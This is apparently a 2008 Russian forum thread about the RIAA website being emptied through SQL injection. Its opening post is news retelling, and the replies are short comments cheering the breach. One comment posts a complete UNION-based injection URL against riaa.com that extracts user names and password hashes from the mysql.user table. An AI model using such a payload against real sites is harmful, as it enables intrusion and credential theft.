|
Сайт RIAA почищен "хакерами"
20-Янв-2008
http://habrahabr.ru/pictures/00/00/0.../picture_8.jpg С помощью простого "SQL injection" их пропаганда была успешно удалена с сайта. Начало было положено на сайте Reddit(социальная сеть новостей), где была размещена ссылка на действительно замедляющий сервер SQL запрос. Пока пользователи Reddit пытались прекратить деятельность сервера,по некоторым утверждениям кто-то, определённо, внёс свою лепту и потёр всю базу данных. До сих пор комментарии на Reddit ведутся только в форме обсуждения, в полуанонимной форме (имена авторов комментариев не имеют ссылок), поэтому невозможно установить их принадлежность, так же как и тех, кто мог бы найти другой способ удалить контент с сайта RIAA. Так же, возможно, что в RIAA сами удалили контент на время устранения неполадок. Это маловероятно- отключать базу данных лучшее решение при большой проблеме с базой данных. В то время как данную уязвимость можно отладить за несколько секунд. изолированная проблема- не решение. http://habrahabr.ru/pictures/00/00/0.../picture_7.jpg До сих пор всё выгдядело так, как будто контент стёрт со стартовой страницы RIAA. Будем надеятся что у них есть резервные копии, или не будем. Пустой сайт RIAA http://habrahabr.ru/pictures/00/00/0.../picture_9.jpg источник |
http://img301.imageshack.us/img301/724/riaaaask8.th.jpg
свободу попугаям!! )) Код:
http://riaa.com/newsitem.php?news_year_filter=&resultpage=&id=9AF90AF0-AA13-82A2-E693-D777D72F6B1C'+and+1=-1+union+select+1,2,3,4,concat_ws(0x3a,password,user),6,7,8,9+from+mysql.user+limit+0,1/* |
ужос...начало конца?=)
|
Хорошая новость. Ненавижу riaa :)
|
первый раз в жизни увидел этот сайт
|
риа не пройдёд ! гипер война началась =/
|
+1 кто это такие? чо даж не влом было..
|
| Время: 02:20 |